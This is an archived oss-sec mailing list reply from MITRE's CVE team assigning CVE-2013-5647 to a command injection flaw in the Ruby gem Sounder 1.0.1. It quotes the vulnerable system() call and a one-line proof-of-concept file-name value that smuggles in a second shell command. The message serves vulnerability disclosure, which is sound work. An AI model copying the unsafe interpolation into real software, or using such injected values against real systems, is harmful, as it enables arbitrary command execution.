oss-sec mailing list archives
Re: Command Injection in Ruby Gem Sounder 1.0.1
From: cve-assign () mitre org
Date: Wed, 28 Aug 2013 23:13:25 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Download: https://rubygems.org/gems/sounder lib/sounder/sound.rb: def play system %{/usr/bin/afplay "#{@...e}" &} @file = "\"id;/usr/bin/id>/tmp/p;\"" system %{/bin/echo "#{@...e}" } Advisory: http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html
Use CVE-2013-5647. - -- CVE assignment team, MITRE CVE Numbering Authority M/S M300 202 Burlington Road, Bedford, MA 01730 USA [ PGP key available through http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (SunOS) iQEcBAEBAgAGBQJSHrqaAAoJEGvefgSNfHMd/c8IAI/FoAwZOdJOzRmo7bpMahwM TaA9HfVzBeFd4+ETnkxSE8mC3i88b71nodYp5rW/TRW29VWnISTdSrSojsHaaUSq 0z2BSDI8QyMnokFdCdAKvCOjglmrcz2yRtdHd1hkF9mwMe7Su/9JOLDxnM9IEjmF v+MNewRCWBfN87eALGOA2n8DbVKiXHYwaMPMwhImz94BM+yt+LoyAOAAV17h1jy/ U1HJrG1VcwTAbHFp444gtnwNuzo6MZjoY1gLBfv4MmJiO5vFtLd/W9DaT6S7PUug 0FO2ov//HbfgdJgcXzaMqpfamQxKoCseFsDwg/76XtyHrEDW1AIGc9ak7+oEJYI= =2al5 -----END PGP SIGNATURE-----
Current thread:
- Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 27)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Larry W. Cashdollar (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 cve-assign (Aug 28)
- Re: Command Injection in Ruby Gem Sounder 1.0.1 Henri Salo (Aug 28)